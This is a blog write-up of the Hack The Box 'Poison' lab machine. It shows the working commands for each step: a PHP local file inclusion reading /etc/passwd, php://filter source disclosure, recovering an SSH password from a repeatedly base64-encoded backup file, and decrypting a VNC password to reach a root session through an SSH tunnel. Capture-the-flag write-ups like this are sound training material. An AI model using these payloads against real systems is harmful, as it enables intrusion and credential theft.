<!doctype html><html dir=ltr lang=en data-theme class="html theme--light"><head><title>Tobias Brixen
|
Hack the box - Poison
</title><meta charset=utf-8><meta name=generator content="Hugo 0.120.0"><meta name=viewport content="width=device-width,initial-scale=1,viewport-fit=cover"><meta name=author content="Tobias Brixen"><meta name=description content><link rel=stylesheet href=/scss/main.min.1147aa5bacb4bce677a0e264073829caedb82fd18ea07a5f1d80521f539d1c45.css integrity="sha256-EUeqW6y0vOZ3oOJkBzgpyu24L9GOoHpfHYBSH1OdHEU=" crossorigin=anonymous type=text/css><link rel=stylesheet href=/css/markupHighlight.min.73ccfdf28df555e11009c13c20ced067af3cb021504cba43644c705930428b00.css integrity="sha256-c8z98o31VeEQCcE8IM7QZ688sCFQTLpDZExwWTBCiwA=" crossorigin=anonymous type=text/css><link rel=stylesheet href=/fontawesome/css/fontawesome.min.7d272de35b410fb165377550cdf9c4d3a80fbbcc961e111914e4d5c0eaf5729f.css integrity="sha256-fSct41tBD7FlN3VQzfnE06gPu8yWHhEZFOTVwOr1cp8=" crossorigin=anonymous type=text/css><link rel=stylesheet href=/fontawesome/css/solid.min.55d8333481b07a08e07cf6f37319753a2b47e99f4c395394c5747b48b495aa9b.css integrity="sha256-VdgzNIGwegjgfPbzcxl1OitH6Z9MOVOUxXR7SLSVqps=" crossorigin=anonymous type=text/css><link rel=stylesheet href=/fontawesome/css/regular.min.a7448d02590b43449364b6b5922ed9af5410abb4de4238412a830316dedb850b.css integrity="sha256-p0SNAlkLQ0STZLa1ki7Zr1QQq7TeQjhBKoMDFt7bhQs=" crossorigin=anonymous type=text/css><link rel=stylesheet href=/fontawesome/css/brands.min.9ed75a5d670c953fe4df935937674b4646f92674367e9e66eb995bb04e821647.css integrity="sha256-ntdaXWcMlT/k35NZN2dLRkb5JnQ2fp5m65lbsE6CFkc=" crossorigin=anonymous type=text/css><link rel="shortcut icon" href=/favicon.ico type=image/x-icon><link rel=apple-touch-icon sizes=180x180 href=/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/favicon-16x16.png><link rel=canonical href=https://tbrixen.github.io/post/htb-poison/><script type=text/javascript src=/js/anatole-header.min.f9132794301a01ff16550ed66763482bd848f62243d278f5e550229a158bfd32.js integrity="sha256-+RMnlDAaAf8WVQ7WZ2NIK9hI9iJD0nj15VAimhWL/TI=" crossorigin=anonymous></script><script type=text/javascript src=/js/anatole-theme-switcher.min.d6d329d93844b162e8bed1e915619625ca91687952177552b9b3e211014a2957.js integrity="sha256-1tMp2ThEsWLovtHpFWGWJcqRaHlSF3VSubPiEQFKKVc=" crossorigin=anonymous></script><script async defer src=https://analytics.umami.is/script.js data-website-id=b1c6be44-f1ef-4886-862e-f468d2b074be></script><meta name=twitter:card content="summary"><meta name=twitter:title content="Hack the box - Poison"><meta name=twitter:description content="This is my writeup of the poison machine from HackTheBox.eu. The machine is currently 138 days old, it has 6955 user owns and 4330 system owns, and is rated 3."><meta property="og:title" content="Hack the box - Poison"><meta property="og:description" content="This is my writeup of the poison machine from HackTheBox.eu. The machine is currently 138 days old, it has 6955 user owns and 4330 system owns, and is rated 3."><meta property="og:type" content="article"><meta property="og:url" content="https://tbrixen.github.io/post/htb-poison/"><meta property="article:section" content="post"><meta property="article:published_time" content="2018-08-10T11:28:47+02:00"><meta property="article:modified_time" content="2018-08-10T11:28:47+02:00"><meta property="og:site_name" content="tbrixen"><script type=application/ld+json>{"@context":"http://schema.org","@type":"BlogPosting","articleSection":"post","name":"Hack the box - Poison","headline":"Hack the box - Poison","alternativeHeadline":"","description":"
      
        This is my writeup of the poison machine from HackTheBox.eu. The machine is currently 138 days old, it has 6955 user owns and 4330 system owns, and is rated 3.


      


    ","inLanguage":"en-us","isFamilyFriendly":"true","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/tbrixen.github.io\/post\/htb-poison\/"},"author":{"@type":"Person","name":"Tobias Brixen"},"creator":{"@type":"Person","name":"Tobias Brixen"},"accountablePerson":{"@type":"Person","name":"Tobias Brixen"},"copyrightHolder":{"@type":"Person","name":"Tobias Brixen"},"copyrightYear":"2018","dateCreated":"2018-08-10T11:28:47.00Z","datePublished":"2018-08-10T11:28:47.00Z","dateModified":"2018-08-10T11:28:47.00Z","publisher":{"@type":"Organization","name":"Tobias Brixen","url":"https://tbrixen.github.io/","logo":{"@type":"ImageObject","url":"https:\/\/tbrixen.github.io\/favicon-32x32.png","width":"32","height":"32"}},"image":[],"url":"https:\/\/tbrixen.github.io\/post\/htb-poison\/","wordCount":"808","genre":[],"keywords":[]}</script></head><body class=body><div class=wrapper><aside class=wrapper__sidebar><div class="sidebar
animated fadeInDown"><div class=sidebar__content><div class=sidebar__introduction><img class=sidebar__introduction-profileimage src=/images/profile.png alt="profile picture"><div class=sidebar__introduction-title><a href=/>tbrixen</a></div><div class=sidebar__introduction-description><p></p></div></div><ul class=sidebar__list><li class=sidebar__list-item><a href=http://github.com/tbrixen target=_blank rel="noopener me" aria-label=Github title=Github><i class="fab fa-github fa-2x" aria-hidden=true></i></a></li><li class=sidebar__list-item><a href=https://dk.linkedin.com/in/tbrixen target=_blank rel="noopener me" aria-label=Linkedin title=Linkedin><i class="fab fa-linkedin fa-2x" aria-hidden=true></i></a></li></ul></div><footer class="footer footer__sidebar"><ul class=footer__list><li class=footer__item>&copy;
Tobias Brixen
2023</li></ul></footer><script type=text/javascript src=/js/medium-zoom.min.1248fa75275e5ef0cbef27e8c1e27dc507c445ae3a2c7d2ed0be0809555dac64.js integrity="sha256-Ekj6dSdeXvDL7yfoweJ9xQfERa46LH0u0L4ICVVdrGQ=" crossorigin=anonymous></script></div></aside><main class=wrapper__main><header class=header><div class="animated fadeInDown"><a role=button class=navbar-burger data-target=navMenu aria-label=menu aria-expanded=false><span aria-hidden=true class=navbar-burger__line></span>
<span aria-hidden=true class=navbar-burger__line></span>
<span aria-hidden=true class=navbar-burger__line></span></a><nav class=nav><ul class=nav__list id=navMenu></ul><ul class="nav__list nav__list--end"><li class=nav__list-item><div class=themeswitch><a title="Switch Theme"><i class="fas fa-adjust fa-fw" aria-hidden=true></i></a></div></li></ul></nav></div></header><div class="post
animated fadeInDown"><div class=post__content><h1>Hack the Box - Poison</h1><ul class=post__meta><li class=post__meta-item><em class="fas fa-calendar-day post__meta-icon"></em>
<span class=post__meta-text>Fri, Aug 10, 2018</span></li><li class=post__meta-item><em class="fas fa-stopwatch post__meta-icon"></em>
<span class=post__meta-text>4-minute read</span></li></ul><h3>Table of Contents</h3><nav id=TableOfContents><ul><li><a href=#scanning-and-enumeration>Scanning and Enumeration</a></li><li><a href=#owning-user>Owning User</a></li><li><a href=#owning-root>Owning Root</a></li></ul></nav><p>This is my writeup of the <a href=https://www.hackthebox.com/machines/poison>poison</a> machine from HackTheBox.eu.
The machine is currently 138 days old, it has 6955 user owns and 4330 system owns, and is rated 3.8 in difficulty.</p><p><img src=htb-status.png alt="HTB status"></p><h2 id=scanning-and-enumeration>Scanning and Enumeration</h2><p>I started out with a scan of the machine to find any open ports <code>nmap -Pn -p1-65535 -A -v -sS 10.10.10.84</code>. The resulting <a href=nmap_scan>scan</a> showed the following open ports</p><ul><li>22 OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)</li><li>80 Apache/2.4.29 (FreeBSD) PHP/5.6.32</li><li>5802/tcp open http Bacula http config</li><li>5902/tcp open vnc VNC (protocol 3.8)</li><li>5903/tcp open vnc VNC (protocol 3.8)</li><li>6002/tcp open X11 (access denied)</li><li>6003/tcp open X11 (access denied)</li></ul><p>I noticed a lot of VNC sessions, but decided to start out with the web server.</p><h2 id=owning-user>Owning User</h2><p>When I opened the site the following screen greeted me</p><p><img src=index.png alt=index></p><p>Without testing the scripts the website suggested, I immediately tested for local file include (LFI) and remote file inclusion (RFI). This lead me somewhat off track as I only needed the scripts in order to own the user.</p><p>First, I manually tried to get LFI by including <code>../../../../../etc/passwd</code>. This succeeded (see <a href=passwd>/etc/passwd/</a>), and I found the <code>charix</code> user at the very bottom (this is also the name of the machine creator).</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-sh data-lang=sh><span class=line><span class=cl>$ curl http://10.10.10.84/browse.php?file<span class=o>=</span>../../../../../etc/passwd
</span></span><span class=line><span class=cl><span class=c1># $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $</span>
</span></span><span class=line><span class=cl><span class=c1>#</span>
</span></span><span class=line><span class=cl>root:*:0:0:Charlie <span class=p>&amp;</span>:/root:/bin/csh
</span></span><span class=line><span class=cl>toor:*:0:0:Bourne-again Superuser:/root:
</span></span><span class=line><span class=cl>---- snip ----
</span></span><span class=line><span class=cl>charix:*:1001:1001:charix:/home/charix:/bin/csh
</span></span></code></pre></div><p>Trying different php LFI techniques (see <a href=https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal>PayloadAllTheThings</a>) I could leverage <code>php://filter</code> to get the source code for the vulnerable inclusion script</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-sh data-lang=sh><span class=line><span class=cl>$ curl -s <span class=s2>&#34;http://10.10.10.84/browse.php?file=php://filter/convert.base64-encode/resource=browse.php&#34;</span> <span class=p>|</span> base64 -d
</span></span><span class=line><span class=cl>&lt;?php
</span></span><span class=line><span class=cl>include<span class=o>(</span><span class=nv>$_GET</span><span class=o>[</span><span class=s1>&#39;file&#39;</span><span class=o>])</span><span class=p>;</span>
</span></span><span class=line><span class=cl>?&gt;
</span></span></code></pre></div><p>Further LFI fuzzing using <code>dirb</code> and the <code>LFI-jhaddix</code> file from SecLists gave me a lot of files, from which I could not use anything <code>dirb http://10.10.10.84/browse.php?file= SecLists/Fuzzing/LFI-JHADDIX.txt -f</code>. See <a href=fuzz_lfi-jhaddix>LFI-results</a> for the files it got me.</p><p>Getting back on track using the scripts the website suggested my:
Using list-files got me</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-php data-lang=php><span class=line><span class=cl><span class=k>Array</span>
</span></span><span class=line><span class=cl><span class=p>(</span>
</span></span><span class=line><span class=cl>    <span class=p>[</span><span class=mi>0</span><span class=p>]</span> <span class=o>=&gt;</span> <span class=o>.</span>
</span></span><span class=line><span class=cl>    <span class=p>[</span><span class=mi>1</span><span class=p>]</span> <span class=o>=&gt;</span> <span class=o>..</span>
</span></span><span class=line><span class=cl>    <span class=p>[</span><span class=mi>2</span><span class=p>]</span> <span class=o>=&gt;</span> <span class=nx>browse</span><span class=o>.</span><span class=nx>php</span>
</span></span><span class=line><span class=cl>    <span class=p>[</span><span class=mi>3</span><span class=p>]</span> <span class=o>=&gt;</span> <span class=nx>index</span><span class=o>.</span><span class=nx>php</span>
</span></span><span class=line><span class=cl>    <span class=p>[</span><span class=mi>4</span><span class=p>]</span> <span class=o>=&gt;</span> <span class=nx>info</span><span class=o>.</span><span class=nx>php</span>
</span></span><span class=line><span class=cl>    <span class=p>[</span><span class=mi>5</span><span class=p>]</span> <span class=o>=&gt;</span> <span class=nx>ini</span><span class=o>.</span><span class=nx>php</span>
</span></span><span class=line><span class=cl>    <span class=p>[</span><span class=mi>6</span><span class=p>]</span> <span class=o>=&gt;</span> <span class=nx>listfiles</span><span class=o>.</span><span class=nx>php</span>
</span></span><span class=line><span class=cl>    <span class=p>[</span><span class=mi>7</span><span class=p>]</span> <span class=o>=&gt;</span> <span class=nx>phpinfo</span><span class=o>.</span><span class=nx>php</span>
</span></span><span class=line><span class=cl>    <span class=p>[</span><span class=mi>8</span><span class=p>]</span> <span class=o>=&gt;</span> <span class=nx>pwdbackup</span><span class=o>.</span><span class=nx>txt</span>
</span></span><span class=line><span class=cl><span class=p>)</span>
</span></span></code></pre></div><p>Reading <code>pwdbackup.txt</code> got me</p><pre tabindex=0><code class=language-base64 data-lang=base64>Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=
</code></pre><p>Decoding it 13 times gives <code>Charix!2#4%6&amp;8(0</code>, which enabled me to log in <code>ssh charix@10.10.10.84</code>.</p><h2 id=owning-root>Owning Root</h2><p>During the enumeration I saw a lot of VNC sessions. One of these were started by root</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-sh data-lang=sh><span class=line><span class=cl>charix@Poison:/tmp % ps auxww  <span class=p>|</span> grep vnc
</span></span><span class=line><span class=cl>root   <span class=m>529</span>   0.0  0.9  <span class=m>23620</span>  <span class=m>8872</span> v0- I    09:01   0:00.05 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth <span class=m>24</span> -rfbwait <span class=m>120000</span> -rfbauth /root/.vnc/passwd -rfbport <span class=m>5901</span> -localhost -nolisten tcp :1
</span></span><span class=line><span class=cl>charix <span class=m>777</span>   0.0  0.0    <span class=m>412</span>   <span class=m>328</span>  <span class=m>3</span>  R+   09:06   0:00.00 grep vnc
</span></span></code></pre></div><p>This could be the entry point to owning root but I didn&rsquo;t know how.
What I could see was that there was a <code>.vnc</code> folder in the home folder of the <code>charix</code>. It contained a <code>passwd</code> file with some gibberish.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-sh data-lang=sh><span class=line><span class=cl>$ cat /home/charix/.vnc/passwd <span class=p>|</span> xxd -p
</span></span><span class=line><span class=cl>a7cd4c5eab70e29b
</span></span></code></pre></div><p>After some searching around I found that it was the obfuscated password of the user.
As it was obfuscated there had to be someone who could deobfuscate it. A long story short, the password is DES encrypted by a static key.
But deobduscating the password of Charix made no sense as I already had access as that user.
I stopped with the vnc attack vector.</p><p>When SSH&rsquo;ing in, the file <code>secret.zip</code> was located in the home directory. I copied the file to my local machine and unzipped it, which revealed the file <code>secret</code>.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-sh data-lang=sh><span class=line><span class=cl>$ scp ssh charix@10.10.10.84:secret.zip
</span></span><span class=line><span class=cl>$ unzip secret.zip <span class=c1>#unzipped the file &#39;secret&#39;</span>
</span></span><span class=line><span class=cl>$ xxd -p secret
</span></span><span class=line><span class=cl>bda85b7cd5967a21
</span></span></code></pre></div><p>The contents of the file looked very similar to the <code>passwd</code> file for the vnc service for the Charix user.
I then tried to use the deobfuscater I found earlier, and sure enough it gave me a password</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-sh data-lang=sh><span class=line><span class=cl>$ git clone https://github.com/jeroennijhof/vncpwd.git
</span></span><span class=line><span class=cl>$ <span class=nb>cd</span> vncpwd
</span></span><span class=line><span class=cl>$ gcc -o vncpwd vncpwd.c d3des.c
</span></span><span class=line><span class=cl>$ ./vncpwd ../secret
</span></span><span class=line><span class=cl>Password: VNCP@<span class=nv>$$</span>!
</span></span></code></pre></div><p>I then tried to log on to session 1 (the session number can be seen in the <code>ps</code> output above)</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-sh data-lang=sh><span class=line><span class=cl>$ vncviewer 10.10.10.84:1
</span></span><span class=line><span class=cl>vncviewer: ConnectToTcpAddr: connect: Connection refused
</span></span><span class=line><span class=cl>Unable to connect to VNC server
</span></span></code></pre></div><p>Bummer. The session started by root was probably protected somehow.</p><p>I found an <a href=http://www.penguintutor.com/linux/tightvnc>article</a> describing how to secure TightVNC on a raspberry pi, by only allowing connections from localhost. To get access he would use ssh port forwarding:</p><pre tabindex=0><code>$ ssh charix@10.10.10.84 -L 5901:localhost:5901
</code></pre><p>This creates a tcp listener on my Kali box on port 5900. When a connection is established on that port it forwards the traffic through ssh and makes a connection to localhost (on the poison machine) on port 5901.</p><p>With the tunnel set up I tried to connect again</p><pre tabindex=0><code>$ vncviewer localhost:1
</code></pre><p>Success! It prompted for a password, and handed me a vnc session:</p><p><img src=vnc_root.png alt="Getting root flag"></p><p>I couldn&rsquo;t figure out how to copy from the session, and I had to manually copy it.</p></div><div class=post__footer></div><div id=comment><h2>comments</h2><script>const getStoredTheme=()=>localStorage.getItem("theme")==="dark"?"dark":"light",setGiscusTheme=()=>{const e=e=>{const t=document.querySelector("iframe.giscus-frame");t&&t.contentWindow.postMessage({giscus:e},"https://giscus.app")};e({setConfig:{theme:getStoredTheme()}})};document.addEventListener("DOMContentLoaded",()=>{const n={src:"https://giscus.app/client.js","data-repo":"tbrixen/tbrixen.github.io","data-repo-id":"MDEwOlJlcG9zaXRvcnkxODQ4NDI1MQ==","data-category":"Announcements","data-category-id":"DIC_kwDOARoMG84CXzE9","data-mapping":"pathname","data-strict":"0","data-reactions-enabled":"1","data-emit-metadata":"0","data-input-position":"bottom","data-theme":getStoredTheme(),"data-lang":"en","data-loading":"lazy",crossorigin:"anonymous",async:""},e=document.createElement("script");Object.entries(n).forEach(([t,n])=>e.setAttribute(t,n)),document.getElementById("comment").appendChild(e);const t=document.querySelector(".themeswitch");t&&t.addEventListener("click",setGiscusTheme)})</script></div></div></main></div><footer class="footer footer__base"><ul class=footer__list><li class=footer__item>&copy;
Tobias Brixen
2023</li></ul></footer><script type=text/javascript src=/js/medium-zoom.min.1248fa75275e5ef0cbef27e8c1e27dc507c445ae3a2c7d2ed0be0809555dac64.js integrity="sha256-Ekj6dSdeXvDL7yfoweJ9xQfERa46LH0u0L4ICVVdrGQ=" crossorigin=anonymous></script></body></html>